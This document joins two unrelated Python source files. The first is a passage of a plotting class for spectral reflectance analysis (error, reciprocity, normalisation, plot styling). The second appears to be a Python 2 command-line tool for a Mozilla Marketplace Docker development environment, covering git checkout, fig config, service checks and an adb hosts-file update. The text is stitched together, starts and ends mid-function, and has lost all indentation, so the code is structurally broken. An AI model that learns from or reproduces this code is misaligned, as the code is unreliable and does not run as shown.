for sample in self.samples:
for i, geom in enumerate(sample.geoms):
wavelengths = np.array(sample.data[geom]["wavelength"])
if i == 0:
right = np.max(wavelengths)
else:
right = np.max([right, np.max(wavelengths)])
return left, right
def calculate_error(self, left, right, abs_val):
left, right = self.validate_left_right(left, right)
self.error_samples = []
artifact_warning = False
error = False
self.contour_sample = Sample("all samples", "file", "title")
self.contour_sample.data = {"all samples": {"i": [], "e": [], "difference": []}}
self.contour_sample.geoms = ["all samples"]
for i, sample in enumerate(self.samples):
if i == 0 and len(self.samples) > 1:
self.base_sample = sample # Sample(sample.name,sample.file,sample.title)
continue
if len(self.samples) == 1:
# if there is only one sample, we'll use the base to build an error sample with spectra showing
# difference from middle spectrum in list.
i = int(len(sample.geoms) / 2)
self.base_spectrum_label = sample.geoms[i]
self.base_sample = Sample(
str(self.base_spectrum_label), "file", "title"
) # This is used for putting the title onto the new plot (delta R compared to sample (i=x, e=y))
error_sample = Sample(sample.name, sample.file, sample.title)
self.error_samples.append(error_sample)
for geom in sample.geoms:
wavelengths = np.array(sample.data[geom]["wavelength"])
reflectance = np.array(sample.data[geom][self.y_axis])
i, e, az = utils.get_i_e_az(geom)
g = utils.get_phase_angle(i, e, az)
if (
self.exclude_artifacts
): # If we are excluding artifacts, don't calculate slopes for anything in the range that is
# considered to be suspect
if self.plotter.artifact_danger(g, left, right):
artifact_warning = True # We'll return this to the controller, which will throw up a
# dialog warning the user that we are skipping some spectra.
continue
index_left = self.get_index(wavelengths, left)
index_right = self.get_index(wavelengths, right)
if len(self.samples) == 1:
error_sample.data[geom] = {}
error_sample.data[geom]["difference"] = (
reflectance - sample.data[self.base_spectrum_label]["reflectance"]
)
error_sample.data[geom]["wavelength"] = wavelengths
error_sample.geoms.append(geom)
self.contour_sample.data["all samples"]["e"].append(e)
self.contour_sample.data["all samples"]["i"].append(i)
if index_left != index_right:
difference = (
reflectance[index_left:index_right]
- sample.data[self.base_spectrum_label]["reflectance"][index_left:index_right]
)
if abs_val:
difference = np.abs(difference)
self.contour_sample.data["all samples"]["difference"].append(np.mean(difference))
else:
difference = (
reflectance[index_left] - sample.data[self.base_spectrum_label]["reflectance"][index_left]
)
if abs_val:
difference = np.abs(difference)
self.contour_sample.data["all samples"]["difference"].append(difference)
else:
found = False
for existing_label in self.base_sample.geoms:
e_old, i_old, _ = self.plotter.get_e_i_g(existing_label)
if e == e_old and i == i_old:
error_sample.data[geom] = {}
error_sample.data[geom]["difference"] = (
reflectance - self.base_sample.data[existing_label]["reflectance"]
)
error_sample.data[geom]["wavelength"] = wavelengths
error_sample.geoms.append(geom)
self.contour_sample.data["all samples"]["e"].append(e)
self.contour_sample.data["all samples"]["i"].append(i)
if index_left != index_right:
difference = (
reflectance[index_left:index_right]
- self.base_sample.data[existing_label]["reflectance"][index_left:index_right]
)
if abs_val:
difference = np.abs(difference)
self.contour_sample.data["all samples"]["difference"].append(np.mean(difference))
else:
difference = (
reflectance[index_left]
- self.base_sample.data[existing_label]["reflectance"][index_left]
)
if abs_val:
difference = np.abs(difference)
self.contour_sample.data["all samples"]["difference"].append(difference)
found = True
break
if not found:
if error == "":
error = "Error: No corresponding spectrum found.\n"
error += "\n" + str(geom)
error_sample.data[geom] = {}
error_sample.data[geom]["difference"] = reflectance
error_sample.data[geom]["wavelength"] = wavelengths
error_sample.geoms.append(geom)
self.contour_sample.data["all samples"]["e"].append(e)
self.contour_sample.data["all samples"]["i"].append(i)
self.contour_sample.data["all samples"]["difference"].append(np.mean(reflectance))
print(error)
avg_errs = []
for sample in self.error_samples:
for geom in sample.geoms:
wavelengths = np.array(sample.data[geom]["wavelength"])
reflectance = np.array(sample.data[geom]["difference"])
index_left = self.get_index(wavelengths, left)
index_right = self.get_index(wavelengths, right)
if index_right != index_left:
if abs_val:
avg = np.mean(np.abs(sample.data[geom]["difference"][index_left:index_right]))
else:
avg = np.mean(sample.data[geom]["difference"][index_left:index_right])
else:
avg = sample.data[geom]["difference"][index_right]
avg_errs.append(str(geom) + ": " + str(avg))
self.plot.draw_vertical_lines([left, right])
return left, right, avg_errs, artifact_warning
def calculate_reciprocity(self, left, right):
left, right = self.validate_left_right(left, right)
avgs = []
self.recip_samples = (
[]
) # for each recip_sample.data[label], there will be up to two points, which should be reciprocal
# measurements of each other. E.g. recip_sample.name=White Reference,
# recip_sample.data['White reference (i=-20,e=20)'] will contain data for both i=-30,e=-10, and also i=10, e=30.
artifact_warning = False
self.contour_sample = Sample("all samples", "file", "title")
self.contour_sample.data = {"all samples": {"i": [], "e": [], "delta R": []}}
self.contour_sample.geoms = ["all samples"]
for sample in self.samples:
recip_sample = Sample(sample.name, sample.file, sample.title)
for geom in sample.geoms:
i, e, az = utils.get_i_e_az(geom)
g = utils.get_phase_angle(i, e, az)
if (
self.exclude_artifacts
): # If we are excluding artifacts, don't calculate for anything in the range that is
# considered to be suspect
if self.plotter.artifact_danger(g, left, right):
artifact_warning = True # We'll return this to the controller, which will throw up a
# dialog warning the user that we are skipping some spectra.
continue
wavelengths = np.array(sample.data[geom]["wavelength"])
reflectance = np.array(sample.data[geom][self.y_axis])
index_left = self.get_index(wavelengths, left)
index_right = self.get_index(wavelengths, right)
if index_right != index_left:
avg = np.mean(reflectance[index_left:index_right])
else:
avg = reflectance[index_left]
recip_label = sample.name + " (i=" + str(-1 * e) + " e=" + str(-1 * i) + ")"
diff = None
if geom not in recip_sample.data and recip_label not in recip_sample.data:
recip_sample.data[geom] = {"e": [], "g": [], "i": [], "average reflectance": []}
recip_sample.geoms.append(geom)
if geom in recip_sample.data:
recip_sample.data[geom]["e"].append(e)
recip_sample.data[geom]["i"].append(i)
recip_sample.data[geom]["g"].append(g)
recip_sample.data[geom]["average reflectance"].append(avg)
if len(recip_sample.data[geom]["average reflectance"]) > 1:
diff = np.abs(
np.max(recip_sample.data[geom]["average reflectance"])
- np.min(recip_sample.data[geom]["average reflectance"])
)
elif recip_label in recip_sample.data:
recip_sample.data[recip_label]["e"].append(e)
recip_sample.data[recip_label]["i"].append(i)
recip_sample.data[recip_label]["g"].append(g)
recip_sample.data[recip_label]["average reflectance"].append(avg)
if len(recip_sample.data[recip_label]["average reflectance"]) > 1:
diff = np.abs(
np.max(recip_sample.data[recip_label]["average reflectance"])
- np.min(recip_sample.data[recip_label]["average reflectance"])
) # This works fine if for some reason there are multiple measurements for the same sample
# at the same geometry. It just takes the min and max.
recip = diff / np.mean(recip_sample.data[recip_label]["average reflectance"])
if diff is not None:
avgs.append(str(geom) + ": " + str(recip)) # I don't think this is the average of anything
self.recip_samples.append(recip_sample)
for sample in self.recip_samples:
for geom in sample.data:
if len(sample.data[geom]["average reflectance"]) > 1:
i, e, az = utils.get_i_e_az(geom)
g = utils.get_phase_angle(i, e, az)
diff = np.abs(
np.max(sample.data[geom]["average reflectance"])
- np.min(sample.data[geom]["average reflectance"])
) # This works fine if for some reason there are multiple measurements for the same sample
# at the same geometry. It just takes the min and max.
recip = diff / np.mean(sample.data[geom]["average reflectance"])
self.contour_sample.data["all samples"]["e"].append(e)
self.contour_sample.data["all samples"]["i"].append(i)
self.contour_sample.data["all samples"]["delta R"].append(recip)
self.contour_sample.data["all samples"]["e"].append(-1 * i)
self.contour_sample.data["all samples"]["i"].append(-1 * e)
self.contour_sample.data["all samples"]["delta R"].append(recip)
self.plot.draw_vertical_lines([left, right])
return left, right, avgs, artifact_warning
def plot_error(self, x_axis):
if x_axis == "e,i":
x_axis = "contour"
tab = Tab(
self.plotter,
"\u0394" + "R compared to " + self.base_sample.name,
[self.contour_sample],
x_axis="contour",
y_axis="difference",
)
elif x_axis == "az, e":
self.plot_hemisphere_plots("difference", "Difference")
else:
tab = Tab(
self.plotter,
"\u0394" + "R compared to " + self.base_sample.name,
self.error_samples,
x_axis="wavelength",
y_axis="difference",
)
return tab
def plot_reciprocity(self, x_axis):
if x_axis == "e,i":
x_axis = "contour"
tab = Tab(self.plotter, "Reciprocity", [self.contour_sample], x_axis=x_axis, y_axis="delta R")
else:
tab = Tab(self.plotter, "Reciprocity", self.recip_samples, x_axis=x_axis, y_axis="average reflectance")
return tab
def plot_avg_reflectance(self, x_axis):
if x_axis in ("e", "theta"):
Tab(
self.plotter,
"Reflectance vs " + x_axis,
self.incidence_samples,
x_axis=x_axis,
y_axis="average reflectance",
)
elif x_axis == "i":
Tab(
self.plotter,
"Reflectance vs " + x_axis,
self.emission_samples,
x_axis=x_axis,
y_axis="average reflectance",
)
elif x_axis == "g":
Tab(
self.plotter,
"Reflectance vs " + x_axis,
self.incidence_samples,
x_axis=x_axis,
y_axis="average reflectance",
)
elif x_axis == "e,i":
tab = Tab(
self.plotter, "Reflectance", [self.contour_sample], x_axis="contour", y_axis="average reflectance"
)
# For whatever reason, x and y labels don't show up
# unless these update functions are called.
tab.plot.fig.canvas.draw()
tab.plot.white_fig.canvas.draw()
elif x_axis == "az, e":
self.plot_hemisphere_plots("average reflectance", "Reflectance")
def plot_hemisphere_plots(self, key, data_label):
for incidence_sample in self.incidence_samples:
for i_geom in incidence_sample.data:
incidence = i_geom[0]
sample_name = incidence_sample.name
geoms = []
data = []
for j, emission in enumerate(incidence_sample.data[i_geom]["e"]):
azimuth = incidence_sample.data[i_geom]["az"][j]
geoms.append((incidence, emission, azimuth))
data.append(incidence_sample.data[i_geom][key][j])
if len(data) > 7:
try:
self.hemisphere_plotter.plot(geoms, data, incidence, sample_name, data_label)
except Exception as e:
print("Failed to create hemisphere plot")
raise e
else:
self.plotter.controller.log(
f"Not creating hemisphere plot for i = {incidence} (Not enough datapoints)."
)
def plot_band_centers(self, x_axis):
if x_axis in ("e", "theta"):
Tab(self.plotter, "Band center vs " + x_axis, self.incidence_samples, x_axis=x_axis, y_axis="band center")
elif x_axis == "i":
Tab(self.plotter, "Band center vs " + x_axis, self.emission_samples, x_axis=x_axis, y_axis="band center")
elif x_axis == "g":
Tab(self.plotter, "Band center vs " + x_axis, self.incidence_samples, x_axis=x_axis, y_axis="band center")
elif x_axis == "e,i":
Tab(self.plotter, "Band center", [self.contour_sample], x_axis="contour", y_axis="band center")
elif x_axis == "az, e":
self.plot_hemisphere_plots("band center", "Band center [nm]")
def plot_band_depths(self, x_axis):
if x_axis in ("e", "theta"):
Tab(self.plotter, "Band depth vs " + x_axis, self.incidence_samples, x_axis=x_axis, y_axis="band depth")
elif x_axis == "i":
Tab(self.plotter, "Band depth vs " + x_axis, self.emission_samples, x_axis=x_axis, y_axis="band depth")
elif x_axis == "g":
Tab(self.plotter, "Band depth vs " + x_axis, self.incidence_samples, x_axis=x_axis, y_axis="band depth")
elif x_axis == "e,i":
Tab(self.plotter, "Band depth", [self.contour_sample], x_axis="contour", y_axis="band depth")
elif x_axis == "az, e":
self.plot_hemisphere_plots("band depth", "Band depth")
def plot_slopes(self, x_axis):
if x_axis == "e,i":
Tab(self.plotter, "Slope", [self.contour_sample], x_axis="contour", y_axis="slope")
elif x_axis in ("e", "theta"):
Tab(self.plotter, "Slope vs " + x_axis, self.incidence_samples, x_axis=x_axis, y_axis="slope")
elif x_axis == "i":
Tab(self.plotter, "Slope vs " + x_axis, self.emission_samples, x_axis=x_axis, y_axis="slope")
elif x_axis == "g":
Tab(self.plotter, "Slope vs " + x_axis, self.incidence_samples, x_axis=x_axis, y_axis="slope")
elif x_axis == "i,e":
Tab(self.plotter, "Slope", [self.contour_sample], x_axis="contour", y_axis="slope")
elif x_axis == "az, e":
self.plot_hemisphere_plots("slope", "Slope")
# not implemented
def calculate_photometric_variability(self, left, right):
# pylint: disable = unreachable
raise NotImplementedError
left = float(left)
right = float(right)
photo_var = []
for sample in self.samples:
min_slope = None
max_slope = None
for i, geom in enumerate(sample.geoms):
wavelengths = np.array(sample.data[geom]["wavelength"])
reflectance = np.array(sample.data[geom]["reflectance"])
index_left = (np.abs(wavelengths - left)).argmin() # find index of wavelength
index_right = (np.abs(wavelengths - right)).argmin() # find index of wavelength
slope = (reflectance[index_right] - reflectance[index_left]) / (index_right - index_left)
if i == 0:
min_slope = slope
min_slope_label = geom.split("(")[1].strip(")") + " (" + str(slope) + ")"
max_slope = slope
max_slope_label = geom.split("(")[1].strip(")") + " (" + str(slope) + ")"
else:
if slope < min_slope:
min_slope = slope
min_slope_geom = geom.split("(")[1].strip(")") + " (" + str(slope) + ")"
if slope > max_slope:
max_slope = slope
max_slope_label = geom.split("(")[1].strip(")") + " (" + str(slope) + ")"
var = max_slope - min_slope
photo_var.append(sample.name + ": " + str(var))
photo_var.append(" min: " + min_slope_label)
photo_var.append(" max: " + max_slope_label)
self.plot.draw_vertical_lines([left, right])
return photo_var
def normalize(self, wavelength):
wavelength = float(wavelength)
normalized_samples = []
for sample in self.samples:
normalized_sample = Sample(
sample.name, sample.file, sample.title
) # Note that we aren't editing the original samples list, we're making entirely new objects.
# This way we can reset later.
for geom in sample.geoms:
wavelengths = np.array(sample.data[geom]["wavelength"])
if "reflectance" in sample.data[geom]:
reflectance = np.array(sample.data[geom]["reflectance"])
else:
reflectance = np.array(sample.data[geom]["normalized reflectance"])
index = (
np.abs(wavelengths - wavelength)
).argmin() # find index of wavelength closest to wavelength we want to normalize to
multiplier = 1 / reflectance[index] # Normalize to 1
reflectance = reflectance * multiplier
reflectance = list(reflectance)
# if label not in normalized_sample.data:
normalized_sample.data[geom] = {"wavelength": [], "normalized reflectance": []}
normalized_sample.geoms.append(geom)
normalized_sample.data[geom]["wavelength"] = wavelengths
normalized_sample.data[geom]["normalized reflectance"] = reflectance
# normalized_sample.add_spectrum(geom, reflectance,sample.data[geom]['wavelength'])
normalized_samples.append(normalized_sample)
self.samples = normalized_samples
self.refresh(
original=self.original_samples, xlim=self.xlim, y_axis="normalized reflectance"
) # Let the tab know this data has been modified and we want to hold on to a separate set of original
# samples. If we're zoomed in, save the xlim but not the ylim (since y scale will be changing)
@staticmethod
def lift_widget(widget):
widget.focus_set()
widget.lift()
def draw_labels(self):
self.plot.draw_labels()
def get_sample(self, sample_name):
if ":" in sample_name:
title = sample_name.split(":")[0]
name = sample_name.split(":")[1]
else:
title = None
name = sample_name
for sample in self.samples:
if name == sample.name:
if title is None or sample.title == title:
return sample
return None
def set_color(self, sample_name, color):
sample = self.get_sample(sample_name)
if isinstance(color, int): # If the user entered a custom hue value
hue = color
else:
color_index = self.plot.color_names.index(color)
hue = self.plot.hues[color_index]
sample.set_colors(hue)
self.update_plot()
def update_plot(self):
self.plot.draw()
self.plot.fig.canvas.draw()
self.plot.white_fig.canvas.draw()
def set_linestyle(self, sample_name, linestyle):
sample = self.get_sample(sample_name)
linestyles = {"Solid": "-", "Dash": "--", "Dot": ":", "Dot-dash": "-."}
sample.set_linestyle(linestyles[linestyle])
self.update_plot()
def set_markerstyle(self, sample_name, markerstyle):
sample = self.get_sample(sample_name)
markerstyles = {"Circle": "o", "X": "x", "Diamond": "D", "Triangle": "^"}
sample.set_markerstyle(markerstyles[markerstyle])
# for sample in self.samples:
# sample.restart_color_cycle() #Makes sure that we start at the same point for replotting
self.update_plot()
def set_legend_style(self, legend_style):
self.plot.draw_legend(legend_style)
# self.refresh(original=self.original_samples, xlim=self.xlim, ylim=self.ylim, y_axis=self.y_axis)
def set_title(self, title, init=False):
if not init:
self.plotter.titles.remove(self.notebook_title)
base = title
i = 1
while title in self.plotter.titles:
title = base + " (" + str(i) + ")"
i = i + 1
self.notebook_title = title
self.plotter.titles.append(self.notebook_title)
if not init:
self.plot.set_title(title)
self.plotter.notebook.tab(self.top, text=title + " x")
def reset(self):
self.samples = self.original_samples
self.exclude_artifacts = False
self.refresh()
def close_right_click_menu(self, event):
# pylint: disable = unused-argument
self.popup_menu.unpost()
def open_analysis_tools(self):
# Build up lists of strings telling available samples, which of those samples a currently plotted,
# and a dictionary mapping those strings to the sample options.
self.build_sample_lists()
self.plotter.controller.open_analysis_tools(self)
def open_plot_settings(self):
self.build_sample_lists()
self.plotter.controller.open_plot_settings(self)
def build_sample_lists(self):
# Sample options will be the list of strings to put in the listbox.
# If the dataset name for the sample is not "" it will include the dataset name.
self.sample_options_dict = {}
self.sample_options_list = []
self.existing_indices = []
# Each file got a dataset name assigned to it when loaded, so each group of samples from a file will
# have a dataset name associated with them.
# If the dataset name is not "", show it in the listbox.
for i, sample in enumerate(self.plotter.sample_objects):
for plotted_sample in self.samples:
if sample.name == plotted_sample.name and sample.file == plotted_sample.file:
self.existing_indices.append(i)
if sample.title.replace(" ", "") != "":
self.sample_options_dict[sample.title + ": " + sample.name] = sample
self.sample_options_list.append(sample.title + ": " + sample.name)
else:
self.sample_options_dict[sample.name] = sample
self.sample_options_list.append(sample.name)
return self.sample_options_list
# We want to pass a list of existing samples and a list of possible samples.
def ask_which_samples(self):
# Build up lists of strings telling available samples, which of those samples a currently plotted, and
# a dictionary mapping those strings to the sample options.
self.build_sample_lists()
# We tell the controller which samples are already plotted so it can initiate the listbox with those
# samples highlighted.
self.plotter.controller.ask_plot_samples(
self, self.existing_indices, self.sample_options_list, self.geoms, self.notebook_title
)
def set_samples(
self, listbox_labels, title, incidences, emissions, azimuths, exclude_specular=False, tolerance=None
):
# we made a dict mapping sample labels for a listbox to available samples to plot. This was passed back
# when the user clicked ok. Reset this tab's samples to be those ones, then replot.
self.samples = []
if title == "":
title = ", ".join(listbox_labels)
for label in listbox_labels:
self.samples.append(self.sample_options_dict[label])
self.geoms = {"i": incidences, "e": emissions, "az": azimuths}
self.exclude_specular = exclude_specular
if self.exclude_specular:
try:
self.specularity_tolerance = int(tolerance)
except ValueError:
self.specularity_tolerance = 0
winnowed_samples = (
[]
) # These will only have the data we are actually going to plot, which will only be from the
# specificied geometries.
for i, sample in enumerate(self.samples):
winnowed_sample = Sample(sample.name, sample.file, sample.title)
for geom in sample.geoms: # For every spectrum associated with the sample,
# check if it is for a geometry we are going to plot.
# if it is, attach that spectrum to the winnowed sample data
try: # If there is no geometry information for this sample, this will throw an exception.
i, e, az = utils.get_i_e_az(geom)
if self.check_geom(
i, e, az, exclude_specular, self.specularity_tolerance
): # If this is a geometry we are supposed to plot
winnowed_sample.add_spectrum(
geom, sample.data[geom]["reflectance"], sample.data[geom]["wavelength"]
)
except (IndexError, KeyError): # If there's no geometry information, plot the sample.
print("plotting spectrum with invalid geometry information")
winnowed_sample.add_spectrum(
geom, sample.data[geom]["reflectance"], sample.data[geom]["wavelength"]
)
winnowed_samples.append(winnowed_sample)
self.samples = winnowed_samples
self.set_title(title)
self.refresh()
def refresh(
self, original=None, xlim=None, ylim=None, x_axis="wavelength", y_axis="reflectance"
): # Gets called when data is updated, either from edit plot or analysis tools. We set original = False if
# calling from normalize, that way we will still hold on to the unchanged data.
tab_index = self.plotter.notebook.index(self.plotter.notebook.select())
self.plotter.titles.remove(self.notebook_title)
self.plotter.notebook.forget(self.plotter.notebook.select())
self.__init__(
self.plotter,
self.notebook_title,
self.samples,
tab_index=tab_index,
geoms=self.geoms,
original=original,
xlim=xlim,
ylim=ylim,
x_axis=x_axis,
y_axis=y_axis,
exclude_artifacts=self.exclude_artifacts,
exclude_specular=self.exclude_specular,
specularity_tolerance=self.specularity_tolerance,
)
def open_right_click_menu(self, event):
self.popup_menu.post(event.x_root + 10, event.y_root + 1)
self.popup_menu.grab_release()
def close(self):
tabid = self.plotter.notebook.select()
self.plotter.notebook.forget(tabid)
self.plotter.titles.remove(self.notebook_title)
def check_geom(self, i, e, az, exclude_specular=False, tolerance=None):
i = int(float(i)) # Get exception from int('0.0')
e = int(float(e))
if az is not None:
az = int(float(az))
if exclude_specular:
if np.abs(int(i) - (-1 * int(e))) <= tolerance:
return False
good_i = False
if i in self.geoms["i"] or self.geoms["i"] == []:
good_i = True
good_e = False
if e in self.geoms["e"] or self.geoms["e"] == []:
good_e = True
good_az = False
if az in self.geoms["az"] or self.geoms["az"] == []:
good_az = True
return good_i and good_e and good_az
def adjust_x(self, left: float, right: float):
self.xlim = [left, right]
self.plot.adjust_x(left, right)
def adjust_y(self, bottom: float, top: float):
self.ylim = [bottom, top]
self.plot.adjust_y(bottom, top)
def adjust_z(self, low: float, high: float): # only gets called for contour plot
self.zlim = [low, high]
self.plot.adjust_z(low, high)
|
<filename>mkt/cmds.py
import argparse
import ConfigParser as configparser
import functools
import os
import re
import sha
import shutil
import socket
import subprocess
import sys
import tempfile
import textwrap
from collections import namedtuple
from contextlib import contextmanager
from decimal import Decimal
from pprint import pprint
import netifaces
import requests
from fig.cli import main
from version import __version__
ROOT = os.path.dirname(os.path.abspath(__file__))
join = functools.partial(os.path.join, ROOT)
CONFIG_PATH = os.path.expanduser('~/.wharfie')
FIG_PATH = os.getenv('FIG_FILE', os.path.expanduser('~/.mkt.fig.yml'))
BRANCHES = [
'fireplace',
'solitude',
'spartacus',
'webpay',
'zamboni',
'zippy',
'signing-service'
]
FIG_ALIASES = {
'signing-service': 'signing'
}
IMAGES = [
'elasticsearch',
'memcached',
'mysql-data',
'mysql-service',
'nginx',
'redis'
]
# Mapping of the branch to [file in container, file locally].
req = namedtuple('Requirement', ['container', 'local'])
pip = req('/pip/requirements/prod.txt', 'requirements/prod.txt')
js = lambda x, y: req('/srv/{0}/{1}.json'.format(x, y), '{0}.json'.format(y))
REQUIREMENTS = {
'zamboni': [pip],
'solitude': [pip],
'webpay': [pip],
'fireplace': [js('fireplace', 'bower'), js('fireplace', 'package')],
'spartacus': [js('spartacus', 'package')],
'zippy': [js('zippy', 'package')],
}
MIGRATIONS = ['zamboni', 'solitude']
SERVICE_CHECKS = {
'solitude': 'http://mp.dev/solitude/services/status/',
'webpay': 'http://mp.dev/mozpay/services/monitor',
'zamboni': 'http://mp.dev/services/monitor.json'
}
# Command functions:
def check_git_config(args, parser):
for branch in BRANCHES:
branch_dir = join(locations()['tree'], branch)
with pushd(branch_dir):
os.chdir(branch_dir)
print "[{0}]".format(branch)
indent("[remotes]")
indent(subprocess.check_output(['git', 'remote', '-v']), 2)
indent("[Master branch origin]")
origin = subprocess.check_output(['git', 'config', '--get',
'branch.master.remote'])
indent(origin, 2)
print
def revs(args, parser):
for branch in BRANCHES:
branch_dir = join(locations()['tree'], branch)
with pushd(branch_dir):
os.chdir(branch_dir)
active_branch = subprocess.check_output([
'git', 'rev-parse', '--abbrev-ref', 'HEAD'])
rev = subprocess.check_output([
'git', 'log', '-n', '1',
'--pretty=oneline', '--abbrev-commit'])
print "{0}: {1} [{2}]".format(branch, rev.split()[0],
active_branch.rstrip())
def checkout(args, parser, gh_username=None):
if not locations()['tree']:
parser.error('Please set a location by calling root first.')
if not gh_username:
gh_username = whoami(quiet=True)
if not gh_username:
parser.error('Please set a github username with the "whoami" '
'command first')
for branch in BRANCHES:
branch_dir = join(locations()['tree'], branch)
if not os.path.isdir(branch_dir):
subprocess.call([
'git', 'clone', '-o', args.moz_remote_name,
'https://github.com/mozilla/{0}.git'.format(branch),
branch_dir
])
subprocess.call([
'git', 'remote', 'add', args.fork_remote_name,
'https://github.com/{0}/{1}.git'.format(gh_username, branch)
], cwd=branch_dir)
subprocess.call([
'git', 'config', 'branch.master.remote', args.moz_remote_name
])
def whoami(args=None, parser=None, quiet=False):
user = os.environ.get('MKT_GITHUB_USERNAME', None)
if not user:
user = get_config_value('github', 'user')
if args and args.github_username:
user = args.github_username
if user:
set_config_value('github', 'user', user)
if not quiet:
if user:
print('github user: {0}'.format(user))
else:
print('Try setting your github username with '
'"mkt whoami [github_username]"')
return user
def locations():
return {
# Where the checked out projects live.
'tree': get_config_value('paths', 'root'),
# Where the images live, will be local or in the installed path.
'image': join('data', 'images'),
# Where fig config lives, will be local or in the installed file path.
'fig.dist': join('data', 'fig.yml.dist'),
# FIG_FILE is the file that fig uses.
'fig': FIG_PATH
}
def root(args, parser):
if not args.directory and not args.build:
value = get_config_value('paths', 'root')
if value:
print value
return
if args.directory:
directory = os.path.abspath(os.path.expandvars(args.directory))
if not os.path.exists(directory):
raise ValueError('Directory {0} does not exist.'.format(directory))
set_config_value('paths', 'root', directory)
if args.build:
set_config_value('source', 'build', args.build)
update_config(args, parser)
def update_config(args, parser):
context = locations()
build_type = get_config_value('source', 'build', 'local')
for name in BRANCHES + IMAGES:
# If its build locally, write out a local build command.
if build_type == 'local':
value = 'build: {image}/{name}'
# The build command is different if its a branch because the
# path is different.
if name in BRANCHES:
value = 'build: {tree}/{name}'
value = value.format(name=name, **context)
# Just pull from docker hub.
elif build_type == 'hub':
value = 'image: mozillamarketplace/{name}'.format(name=name)
# Wat?
else:
raise ValueError('Unknown build type: {0}. '
'Valid values: hub or local'.format(build_type))
context['build-{0}'.format(name)] = value
src_file = context['fig.dist']
with open(src_file, 'r') as src:
src_data = src.read()
dest_file = context['fig']
new_data = src_data.format(**context)
if os.path.exists(dest_file):
# If the old file is the same as the new file, then there
# is no need to add anything new.
old_data = open(dest_file, 'r').read()
if old_data == new_data:
return
with open(dest_file, 'w') as dest:
dest.write(new_data)
print 'Written fig file to {0}'.format(FIG_PATH)
def up(args, parser, argv):
update_config(args, parser)
cmd = ['up', '-d', '--no-recreate'] + argv
fig_command(*cmd)
up.argv = True
def bash(args, parser):
project = get_project(args.project)
cmd = ('docker exec -t -i {0} /bin/bash'
.format(get_fig_container(project).id))
os.system(cmd)
return
def get_version(method):
methods = {
'docker': [
'Client version: (\d.\d).*?Server version: (\d.\d)',
['docker', 'version']
],
'boot2docker': [
'^Boot2Docker-cli version: v(\d.\d)',
['boot2docker', 'version']
],
'fig': ['^fig (\d.\d)', ['fig', '--version']]
}
regex, command = methods[method]
try:
result = subprocess.check_output(command).strip()
except OSError:
raise ValueError('Command: "{0}" failed, is it installed?'
.format(' '.join(command)))
try:
res = re.findall(regex, result, flags=re.S)
if isinstance(res[0], tuple):
res = res[0]
except IndexError:
raise ValueError('Command: "{0}" returned an unknown value.'
.format(' '.join(command)))
return [Decimal(v) for v in res]
def check(args, parser):
context = locations()
default = os.getenv('FIG_FILE')
diffs = []
if context['fig'] != default:
diffs.append('FIG_FILE={0}'.format(FIG_PATH))
default = os.getenv('FIG_PROJECT_NAME')
if 'mkt' != os.getenv('FIG_PROJECT_NAME'):
diffs.append('FIG_PROJECT_NAME=mkt')
if diffs:
print 'Set the following environment variables: '
for d in diffs:
print d
print
for path in ['tree', 'image']:
if not os.path.exists(context[path]):
print 'Directory {0} does not exist.'.format(context[path])
for branch in BRANCHES:
branch_dir = join(context['tree'], branch)
if not os.path.exists(branch_dir):
print ('Directory {0} does not exist, run checkout.'
.format(branch_dir))
if args.services:
for service, url in SERVICE_CHECKS.items():
try:
res = requests.get(url, timeout=5)
except (requests.exceptions.Timeout,
requests.exceptions.ConnectionError):
# nginx isn't even up.
print 'Error on: {0}, is it running?'.format(service)
continue
if res.status_code == 502:
# nginx proxy errors.
print 'Service not up: {0} (proxy error)'.format(service)
if res.status_code == 500:
print 'Status failed on: {0}.'.format(service)
print
pprint(res.json())
print
if args.versions:
dockers = get_version('docker')
for version in dockers:
if version < Decimal('1.3'):
print ('Update docker, client or server version 1.3 or higher '
'is recommended. Run: docker version')
if get_version('boot2docker')[0] < Decimal('1.3'):
print 'Update boot2docker, version 1.3 or higher recommended.'
if get_version('fig')[0] < Decimal('1.0'):
print 'Update fig, version 1.0 or higher recommended.'
if args.requirements:
for branch in BRANCHES:
files = REQUIREMENTS.get(branch)
if not files:
continue
container = get_container_requirements(branch, files)
local = get_local_requirements(branch, files)
if local != container:
print ('Requirements on container differ from local, '
'rebuild recommended for: {0}'.format(branch))
def update(args, parser):
git, migration = args.git, args.migrations
if not git and not migration:
# If the user didn't pass a flag, run both.
git, migration = True, True
if git:
for branch in BRANCHES:
branch_dir = join(locations()['tree'], branch)
with pushd(branch_dir):
try:
print 'Updating git for: {0}'.format(branch)
indent(subprocess.check_output(['git', 'pull', '-q']), 2)
except subprocess.CalledProcessError:
print
print 'Failed to update: {0}'.format(branch_dir)
print
raise
if migration:
for migration in MIGRATIONS:
print 'Running migration for: {0}'.format(migration)
fig_command('run', '--rm', migration,
'schematic', 'migrations')
def bind(args, parser):
if args.interfaces:
for interface, ip_addr in get_interface_data():
print('{ip} ({int})'.format(ip=ip_addr, int=interface))
return
if not args.bind_ip:
# Guess the IP.
interfaces = get_interface_data(args.bind_int)
if not interfaces:
args.error('No useable interfaces found. Are you connected '
'to a network that your device will be able to "see"?')
if len(interfaces) > 1:
prompt = 'Not sure which IP to use. Please select one [1]:'
interface_ips = get_interface_data()
choices = []
for interface, ip_addr in interface_ips:
choices.append(('{ip} ({int})'.format(ip=ip_addr,
int=interface), ip_addr))
choice = select(choices, prompt=prompt)
args.bind_ip = choice[1]
else:
# Get the only IP we found.
args.bind_ip = interfaces[0][1]
devices = get_adb_devices()
if len(devices) > 1:
raise NotImplementedError(
'adb says more than one device is connected. Updating the '
'right one is not implemented yet.')
elif len(devices) == 0:
parser.error('Could not find any attached devices with adb. '
'Is your device connected?')
print('About to bind host "{host}" on device to IP "{ip}"'
.format(host=args.bind_host, ip=args.bind_ip))
td = tempfile.mkdtemp()
try:
with pushd(td):
subprocess.check_call(['adb', 'remount'])
subprocess.check_call(['adb', 'pull', '/system/etc/hosts', './'])
with open('./hosts') as f:
lines = f.readlines()
newlines = []
for ln in lines:
if (ln.strip().endswith(args.bind_host) or
ln.startswith('# Docker:')):
# Remove the old IP binding and comments.
continue
newlines.append(ln)
newlines.append(
'# Docker: marketplace-env `mkt bind` added this:\n')
newlines.append('{ip}\t\t {host}\n'
.format(ip=args.bind_ip, host=args.bind_host))
with open('./new-hosts', 'w') as f:
f.write(''.join(newlines))
subprocess.check_call(['adb', 'push', './new-hosts',
'/system/etc/hosts'])
finally:
shutil.rmtree(td)
# Helper functions:
def get_container_requirements(branch, files):
project = get_project(branch)
files_str = ' '.join([f.container for f in files])
